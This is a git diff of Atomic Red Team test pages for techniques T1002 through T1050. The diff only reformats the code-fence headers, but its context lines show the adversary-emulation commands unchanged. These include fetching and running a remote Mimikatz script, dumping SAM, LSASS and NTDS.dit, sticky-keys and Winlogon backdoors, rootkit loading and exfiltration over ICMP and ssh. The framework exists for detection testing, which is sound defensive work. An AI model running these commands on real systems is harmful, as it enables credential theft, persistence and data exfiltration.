diff --git a/atomics/T1002/T1002.md b/atomics/T1002/T1002.md
index 956d1344..0288b4a2 100644
--- a/atomics/T1002/T1002.md
+++ b/atomics/T1002/T1002.md
@@ -29,8 +29,7 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
| input_file | Path that should be compressed into our output file | Path | C:\*|
| output_file | Path where resulting compressed data should be placed | Path | C:\test\Data.zip|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
```
@@ -48,8 +47,7 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
| input_file | Path that should be compressed into our output file | Path | *.docx|
| output_file | Path where resulting compressed data should be placed | Path | exfilthis.rar|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
rar a -r #{output_file} #{input_file}
```
@@ -67,8 +65,7 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
| input_files | Path that should be compressed into our output file, may include wildcards | Path | /tmp/victim-files/*|
| output_file | Path that should be output as a zip archive | Path | /tmp/victim-files.zip|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
zip #{output_file} #{input_files}
```
@@ -85,8 +82,7 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
|------|-------------|------|---------------|
| input_file | Path that should be compressed | Path | /tmp/victim-gzip.txt|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
gzip -f #{input_file}
```
@@ -104,8 +100,7 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
| input_file_folder | Path that should be compressed | Path | /tmp/victim-files/|
| output_file | File that should be output | Path | /tmp/victim-files.tar.gz|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
tar -cvzf #{output_file} #{input_file_folder}
```
diff --git a/atomics/T1003/T1003.md b/atomics/T1003/T1003.md
index 768817ec..fe0820f5 100644
--- a/atomics/T1003/T1003.md
+++ b/atomics/T1003/T1003.md
@@ -169,8 +169,7 @@ Dumps Credentials via Powershell by invoking a remote mimikatz script
|------|-------------|------|---------------|
| remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
```
@@ -182,8 +181,7 @@ https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
gsecdump -a
```
@@ -200,8 +198,7 @@ http://www.ampliasecurity.com/research/windows-credentials-editor/
|------|-------------|------|---------------|
| output_file | Path where resulting data should be placed | Path | output.txt|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
wce -o #{output_file}
```
@@ -214,8 +211,7 @@ via three registry keys. Then processed locally using https://github.com/Neohaps
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\security security
@@ -235,8 +231,7 @@ ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysin
|------|-------------|------|---------------|
| output_file | Path where resulting dump should be placed | Path | lsass_dump.dmp|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
procdump.exe -accepteula -ma lsass.exe #{output_file}
```
@@ -249,8 +244,7 @@ Manager and administrative permissions.
**Supported Platforms:** Windows
-#### Run it with these steps!
-1. Open Task Manager:
+#### Run it with these steps! 1. Open Task Manager:
On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
on the task bar and selecting "Task Manager".
@@ -277,8 +271,7 @@ Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
|------|-------------|------|---------------|
| input_file | Path where resulting dump should be placed | Path | lsass_dump.dmp|
-#### Run it with these steps!
-1. Open Mimikatz:
+#### Run it with these steps! 1. Open Mimikatz:
Execute `mimikatz` at a command prompt.
2. Select a Memory Dump:
@@ -304,8 +297,7 @@ subsequent domain controllers without the need of network-based replication.
|------|-------------|------|---------------|
| output_folder | Path where resulting dump should be placed | Path | C:\Atomic_Red_Team|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q
```
@@ -322,8 +314,7 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
|------|-------------|------|---------------|
| drive_letter | Drive letter to source VSC (including colon) | String | C:|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
vssadmin.exe create shadow /for=#{drive_letter}
```
@@ -345,8 +336,7 @@ This test must be executed on a Windows Domain Controller.
| vsc_name | Name of Volume Shadow Copy | String | \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1|
| extract_path | Path for extracted NTDS.dit | Path | C:\Extract|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE
diff --git a/atomics/T1004/T1004.md b/atomics/T1004/T1004.md
index 01b4d876..0a497269 100644
--- a/atomics/T1004/T1004.md
+++ b/atomics/T1004/T1004.md
@@ -32,8 +32,7 @@ PowerShell code to set Winlogon shell key to execute a binary at logon along wit
|------|-------------|------|---------------|
| binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force
```
@@ -50,8 +49,7 @@ PowerShell code to set Winlogon userinit key to execute a binary at logon along
|------|-------------|------|---------------|
| binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force
```
@@ -68,8 +66,7 @@ PowerShell code to set Winlogon Notify key to execute a notification package DLL
|------|-------------|------|---------------|
| binary_to_execute | Path of notification package to execute | Path | C:\Windows\Temp\atomicNotificationPackage.dll|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force
```
diff --git a/atomics/T1005/T1005.md b/atomics/T1005/T1005.md
index 52e7c770..5256f06a 100644
--- a/atomics/T1005/T1005.md
+++ b/atomics/T1005/T1005.md
@@ -22,8 +22,7 @@ This test uses `grep` to search a macOS Safari binaryCookies file for specified
|------|-------------|------|---------------|
| search_string | String to search Safari cookies to find. | string | coinbase|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
cd ~/Library/Cookies
grep -q "#{search_string}" "Cookies.binarycookies"
```
diff --git a/atomics/T1007/T1007.md b/atomics/T1007/T1007.md
index ebad1753..3c5471b8 100644
--- a/atomics/T1007/T1007.md
+++ b/atomics/T1007/T1007.md
@@ -22,8 +22,7 @@ Identify system services
|------|-------------|------|---------------|
| service_name | Name of service to start stop, query | string | svchost.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
tasklist.exe
sc query
sc query state= all
@@ -45,8 +44,7 @@ Enumerates started system services using net.exe and writes them to a file. This
|------|-------------|------|---------------|
| output_file | Path of file to hold net.exe output | Path | C:\Windows\Temp\service-list.txt|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
net.exe start >> #{output_file}
```
diff --git a/atomics/T1009/T1009.md b/atomics/T1009/T1009.md
index 2362559e..532af8e9 100644
--- a/atomics/T1009/T1009.md
+++ b/atomics/T1009/T1009.md
@@ -20,8 +20,7 @@ Uses dd to add a zero to the binary to change the hash
|------|-------------|------|---------------|
| file_to_pad | Path of binary to be padded | Path | /tmp/evil-binary|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}
```
diff --git a/atomics/T1010/T1010.md b/atomics/T1010/T1010.md
index 0d45205c..d2a68afc 100644
--- a/atomics/T1010/T1010.md
+++ b/atomics/T1010/T1010.md
@@ -23,8 +23,7 @@ Compiles and executes C# code to list main window titles associated with each pr
| input_source_code | Path to source of C# code | path | C:\AtomicRedTeam\atomics\T1010\src\T1010.cs|
| output_file_name | Name of output binary | string | T1010.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} #{input_source_code}
#{output_file_name}
```
diff --git a/atomics/T1012/T1012.md b/atomics/T1012/T1012.md
index 02ee4fc5..5ceb2028 100644
--- a/atomics/T1012/T1012.md
+++ b/atomics/T1012/T1012.md
@@ -28,8 +28,7 @@ https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
diff --git a/atomics/T1014/T1014.md b/atomics/T1014/T1014.md
index 560a570f..62cff54e 100644
--- a/atomics/T1014/T1014.md
+++ b/atomics/T1014/T1014.md
@@ -26,8 +26,7 @@ Loadable Kernel Module based Rootkit
|------|-------------|------|---------------|
| rootkit_file | Path To Module | String | Module.ko|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
sudo insmod #{rootkit_file}
```
@@ -44,8 +43,7 @@ Loadable Kernel Module based Rootkit
|------|-------------|------|---------------|
| rootkit_file | Path To Module | String | Module.ko|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
sudo modprobe #{rootkit_file}
```
@@ -69,8 +67,7 @@ It would be wise if you only run this in a test environment
|------|-------------|------|---------------|
| driver_path | Path to the vulnerable driver | Path | C:\Drivers\driver.sys|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
puppetstrings #{driver_path}
```
diff --git a/atomics/T1015/T1015.md b/atomics/T1015/T1015.md
index 07be8405..f692fd90 100644
--- a/atomics/T1015/T1015.md
+++ b/atomics/T1015/T1015.md
@@ -48,8 +48,7 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | osk.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
```
@@ -66,8 +65,7 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | sethc.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
```
@@ -84,8 +82,7 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | utilman.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
```
@@ -102,8 +99,7 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | magnify.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
```
@@ -120,8 +116,7 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | narrator.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
```
@@ -138,8 +133,7 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | DisplaySwitch.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
```
@@ -156,8 +150,7 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | atbroker.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
```
diff --git a/atomics/T1016/T1016.md b/atomics/T1016/T1016.md
index e883ea7d..e48be6ac 100644
--- a/atomics/T1016/T1016.md
+++ b/atomics/T1016/T1016.md
@@ -17,8 +17,7 @@ Identify network configuration information
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
ipconfig /all
netsh interface show
arp -a
@@ -34,8 +33,7 @@ Identify network configuration information
**Supported Platforms:** macOS, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
arp -a
netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c
ifconfig
diff --git a/atomics/T1018/T1018.md b/atomics/T1018/T1018.md
index c0e5d778..ed10dabd 100644
--- a/atomics/T1018/T1018.md
+++ b/atomics/T1018/T1018.md
@@ -35,8 +35,7 @@ Identify remote systems with net.exe
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
net view /domain
net view
```
@@ -49,8 +48,7 @@ Identify remote systems via ping sweep
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i
```
@@ -62,8 +60,7 @@ Identify remote systems via arp
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
arp -a
```
@@ -75,8 +72,7 @@ Identify remote systems via arp
**Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
arp -a | grep -v '^?'
```
@@ -88,8 +84,7 @@ Identify remote systems via ping sweep
**Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip -o; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done
```
diff --git a/atomics/T1022/T1022.md b/atomics/T1022/T1022.md
index 93c58c81..82a3d4c0 100644
--- a/atomics/T1022/T1022.md
+++ b/atomics/T1022/T1022.md
@@ -23,8 +23,7 @@ Encrypt data for exiltration
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
echo "This file will be encrypted" > /tmp/victim-gpg.txt
mkdir /tmp/victim-files
cd /tmp/victim-files
@@ -44,8 +43,7 @@ rar a -p"blue" hello.rar (VARIANT)
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
mkdir ./tmp/victim-files
cd ./tmp/victim-files
echo "This file will be encrypted" > ./encrypted_file.txt
@@ -62,8 +60,7 @@ wzzip sample.zip -s"blueblue" *.txt (VARIANT)
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
path=%path%;"C:\Program Files (x86)\winzip"
mkdir ./tmp/victim-files
cd ./tmp/victim-files
@@ -80,8 +77,7 @@ Note: Requires 7zip installation
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
mkdir ./tmp/victim-files
cd ./tmp/victim-files
echo "This file will be encrypted" > ./encrypted_file.txt
diff --git a/atomics/T1027/T1027.md b/atomics/T1027/T1027.md
index 00975b3b..94f3e137 100644
--- a/atomics/T1027/T1027.md
+++ b/atomics/T1027/T1027.md
@@ -23,8 +23,7 @@ Creates a base64-encoded data file and decodes it into an executable shell scrip
**Supported Platforms:** macOS, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
sh -c "echo ZWNobyBIZWxsbyBmcm9tIHRoZSBBdG9taWMgUmVkIFRlYW0= > /tmp/encoded.dat"
cat /tmp/encoded.dat | base64 -d > /tmp/art.sh
chmod +x /tmp/art.sh
diff --git a/atomics/T1028/T1028.md b/atomics/T1028/T1028.md
index 46137e06..1926fa0a 100644
--- a/atomics/T1028/T1028.md
+++ b/atomics/T1028/T1028.md
@@ -23,8 +23,7 @@ Powershell Enable WinRM
**Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
Enable-PSRemoting -Force
```
@@ -45,8 +44,7 @@ https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-applicatio
|------|-------------|------|---------------|
| computer_name | Name of Computer | string | computer1|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
```
@@ -65,8 +63,7 @@ Utilize WMIC to start remote process
| password | Password | String | P@ssw0rd1|
| computer_name | Target Computer Name | String | Target|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
wmic /user:#{user_name} /password:#{password} /node:#{computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
```
@@ -85,8 +82,7 @@ Utilize psexec to start remote process
| password | Password | String | P@ssw0rd1|
| computer_name | Target Computer Name | String | Target|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
psexec \\host -u domain\user -p password -s cmd.exe
```
@@ -104,8 +100,7 @@ Execute Invoke-command on remote host
| host_name | Remote Windows Host Name | String | Test|
| remote_command | Command to execute on remote Host | String | ipconfig|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
invoke-command -computer_name #{host_name} -scriptblock {#{remote_command}}
```
diff --git a/atomics/T1030/T1030.md b/atomics/T1030/T1030.md
index 75ec66b6..d101540e 100644
--- a/atomics/T1030/T1030.md
+++ b/atomics/T1030/T1030.md
@@ -15,8 +15,7 @@ Take a file/directory, split it into 5Mb chunks
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
cd /tmp/
dd if=/dev/urandom of=/tmp/victim-whole-file bs=25M count=1
split -b 5000000 /tmp/victim-whole-file
diff --git a/atomics/T1031/T1031.md b/atomics/T1031/T1031.md
index 121ab272..4ebe169d 100644
--- a/atomics/T1031/T1031.md
+++ b/atomics/T1031/T1031.md
@@ -20,8 +20,7 @@ and will then revert the binPath change, restoring Fax to its original state.
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1031 Test'\""
sc start Fax
sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe"
diff --git a/atomics/T1033/T1033.md b/atomics/T1033/T1033.md
index d8513de8..a6fa0b62 100644
--- a/atomics/T1033/T1033.md
+++ b/atomics/T1033/T1033.md
@@ -32,8 +32,7 @@ Identify System owner or users on an endpoint
|------|-------------|------|---------------|
| computer_name | Name of remote computer | string | computer1|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
cmd.exe /C whoami
wmic useraccount get /ALL
quser /SERVER:"#{computer_name}"
@@ -52,8 +51,7 @@ Identify System owner or users on an endpoint
**Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
users
w
who
diff --git a/atomics/T1035/T1035.md b/atomics/T1035/T1035.md
index d3c5c675..7cb247e6 100644
--- a/atomics/T1035/T1035.md
+++ b/atomics/T1035/T1035.md
@@ -21,8 +21,7 @@ Creates a service specifying an aribrary command and executes it. When executing
| service_name | Name of service to create | string | ARTService|
| executable_command | Command to execute as a service | string | %COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
sc.exe create #{service_name} binPath= #{executable_command}
sc.exe start #{service_name}
sc.exe delete #{service_name}
diff --git a/atomics/T1036/T1036.md b/atomics/T1036/T1036.md
index 1860baed..de06418b 100644
--- a/atomics/T1036/T1036.md
+++ b/atomics/T1036/T1036.md
@@ -31,8 +31,7 @@ Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsas
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
cmd.exe /c copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
cmd.exe /c %SystemRoot%\Temp\lsass.exe
```
@@ -45,8 +44,7 @@ Copies sh process, renames it as crond, and executes it to masquerade as the cro
**Supported Platforms:** Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
cp /bin/sh /tmp/crond
/tmp/crond
```
diff --git a/atomics/T1037/T1037.md b/atomics/T1037/T1037.md
index b1cf6169..65f9f38f 100644
--- a/atomics/T1037/T1037.md
+++ b/atomics/T1037/T1037.md
@@ -30,8 +30,7 @@ Added Via Reg.exe
|------|-------------|------|---------------|
| script_command | Command To Execute | String | cmd.exe /c calc.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "#{script_command}"
```
@@ -43,8 +42,7 @@ Mac logon script
**Supported Platforms:** macOS
-#### Run it with these steps!
-1. Create the required plist file
+#### Run it with these steps! 1. Create the required plist file
sudo touch /private/var/root/Library/Preferences/com.apple.loginwindow.plist
diff --git a/atomics/T1040/T1040.md b/atomics/T1040/T1040.md
index 5f97548d..3c55520d 100644
--- a/atomics/T1040/T1040.md
+++ b/atomics/T1040/T1040.md
@@ -30,8 +30,7 @@ Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be in
|------|-------------|------|---------------|
| interface | Specify interface to perform PCAP on. | String | ens33|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
tcpdump -c 5 -nnni #{interface}
tshark -c 5 -i #{interface}
```
@@ -49,8 +48,7 @@ Perform a PCAP on MacOS. This will require Wireshark/tshark to be installed. TCP
|------|-------------|------|---------------|
| interface | Specify interface to perform PCAP on. | String | en0A|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
tcpdump -c 5 -nnni #{interface}
tshark -c 5 -i #{interface}
```
@@ -69,8 +67,7 @@ installed, along with WinPCAP. Windump will require the windump executable.
|------|-------------|------|---------------|
| interface | Specify interface to perform PCAP on. | String | Ethernet0|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
c:\Program Files\Wireshark\tshark.exe -i #{interface} -c 5
c:\windump.exe
```
@@ -89,8 +86,7 @@ installed, along with WinPCAP. Windump will require the windump executable.
|------|-------------|------|---------------|
| interface | Specify interface to perform PCAP on. | String | Ethernet0|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
c:\Program Files\Wireshark\tshark.exe -i #{interface} -c 5
c:\windump.exe
```
diff --git a/atomics/T1042/T1042.md b/atomics/T1042/T1042.md
index 960fe846..6ecbbe9b 100644
--- a/atomics/T1042/T1042.md
+++ b/atomics/T1042/T1042.md
@@ -28,8 +28,7 @@ Change Default File Association From cmd.exe
| extension_to_change | File Extension To Hijack | String | .wav|
| target_exenstion_handler | Thing To Open | Path | C:\Program Files\Windows Media Player\wmplayer.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
cmd.exe /c assoc #{extension_to_change}="#{target_exenstion_handler}"
```
diff --git a/atomics/T1046/T1046.md b/atomics/T1046/T1046.md
index 53abc0c4..146b6eaf 100644
--- a/atomics/T1046/T1046.md
+++ b/atomics/T1046/T1046.md
@@ -17,8 +17,7 @@ Scan ports to check for listening ports
**Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
for port in {1..65535};
do
echo >/dev/tcp/192.168.1.1/$port && echo "port $port is open" || echo "port $port is closed" : ;
@@ -40,8 +39,7 @@ Scan ports to check for listening ports with Nmap.
| port | Ports to scan. | string | 80|
| host | Host to scan. | string | 192.168.1.1|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
diff --git a/atomics/T1047/T1047.md b/atomics/T1047/T1047.md
index d94e6c0d..c31acd34 100644
--- a/atomics/T1047/T1047.md
+++ b/atomics/T1047/T1047.md
@@ -23,8 +23,7 @@ WMI List User Accounts
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
wmic useraccount get /ALL
```
@@ -36,8 +35,7 @@ WMI List Processes
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
wmic process get caption,executablepath,commandline
```
@@ -49,8 +47,7 @@ WMI List Software
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
wmic qfe get description,installedOn /format:csv
```
@@ -68,8 +65,7 @@ WMI List Remote Services
| node | Ip Address | String | 192.168.0.1|
| service_search_string | Name Of Service | String | sql server|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
wmic /node:"#{node}" service where (caption like "%#{service_search_string} (%")
```
diff --git a/atomics/T1048/T1048.md b/atomics/T1048/T1048.md
index 902d12e8..9e515de1 100644
--- a/atomics/T1048/T1048.md
+++ b/atomics/T1048/T1048.md
@@ -30,8 +30,7 @@ Remote to Local
| user_name | username for domain | string | atomic|
| password | password for user | string | atomic|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
```
@@ -52,8 +51,7 @@ Local to Remote
| user_name | username for domain | string | atomic|
| password | password for user | string | atomic|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'
```
@@ -65,8 +63,7 @@ A firewall rule (iptables or firewalld) will be needed to allow exfiltration on
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
-#### Run it with these steps!
-1. Victim System Configuration:
+#### Run it with these steps! 1. Victim System Configuration:
mkdir /tmp/victim-staging-area
echo "this file will be exfiltrated" > /tmp/victim-staging-area/victim-file.txt
@@ -96,8 +93,7 @@ Exfiltration of specified file over ICMP protocol.
| input_file | Path to file to be exfiltrated. | Path | C:\Windows\System32\notepad.exe|
| ip_address | Destination IP address where the data should be sent. | String | 1.1.1.1|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) }
```
diff --git a/atomics/T1049/T1049.md b/atomics/T1049/T1049.md
index 320c6ca0..14f996f3 100644
--- a/atomics/T1049/T1049.md
+++ b/atomics/T1049/T1049.md
@@ -27,8 +27,7 @@ Get a listing of network connections.
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
netstat
net use
net sessions
@@ -42,8 +41,7 @@ Get a listing of network connections.
**Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
Get-NetTCPConnection
```
@@ -55,8 +53,7 @@ Get a listing of network connections.
**Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
netstat
who -a
```
diff --git a/atomics/T1050/T1050.md b/atomics/T1050/T1050.md
index c14e323d..48737b6c 100644
--- a/atomics/T1050/T1050.md
+++ b/atomics/T1050/T1050.md
@@ -25,8 +25,7 @@ Installs A Local Service
| binary_path | Name of the service binary, include path. | Path | C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe|
| service_name | Name of the Service | String | AtomicTestService|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
sc.exe create #{service_name} binPath= #{binary_path}
sc.exe start #{service_name}
sc.exe stop #{service_name}
@@ -47,8 +46,7 @@ Installs A Local Service via PowerShell
| binary_path | Name of the service binary, include path. | Path | C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe|
| service_name | Name of the Service | String | AtomicTestService|
